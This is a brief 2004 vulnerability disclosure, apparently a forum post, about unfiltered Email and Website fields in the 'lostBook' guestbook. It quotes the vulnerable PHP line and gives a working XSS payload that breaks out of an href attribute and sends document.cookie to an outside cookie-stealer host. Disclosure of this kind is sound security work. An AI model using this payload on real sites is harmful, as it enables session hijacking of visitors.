Ok the only reason i consider this javascript execution instead of XSS. Is simply because you cant inject html like you can in most XSS vulnrabilities.
On the write entry page of the guest book there are 4 fields: Name, Email, Website, Entry. The Email and Website feild go through no filtering, and a malicous hacker could use that to insert javascript.
-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-
Product: lostBook
vendor: veryLost (verylost.tk)
Affected Versions: 1.1 and lower
Description: A simple flat db guestbook
Vulnerabilities: XSS
Date: July 29, 2004
Vuln Finder: r3d5pik3 (me)
-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-
1.) About
2.) Javascript Execution
3.) Vendor Notice
-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-
(o_O)oOoOoOo [ About ] oOoOoOo(O_o)
Ok the only reason i consider this javascript execution instead of XSS. Is simply because you cant inject html like you can in most XSS vulnrabilities.
-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-
(o_O)oOoOoOo [ JScript Execution ] oOoOoOo(O_o)
On the write entry page of the guest book there are 4 fields: Name, Email, Website, Entry. The Email and Website feild go through no filtering, and a malicous hacker could use that to insert javascript.
Example:
The Website data gets parsed like so
if(isset($web) && $web != "" && $web != " ") echo ' <a href="'.$web.'"><img src="'.$path2files.'website.gif" border="0" alt="'.$web.'"></a>';
An attacker would go about injecting xss by the following ways.
Inputting the following into either email or website field.
r3d5pik3.com" onload="document.location='http://www.cookiestealer.com?cookie='+documen
t.cookie
if onload doesnt work they could simply use onmouseover instead
-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-
(o_O)oOoOoOo [ Vendor Notification ] oOoOoOo(O_o)
A couple seconds ago.
-r3d5pik3
ph33r t3h r3d 1z !!!
[ reply ]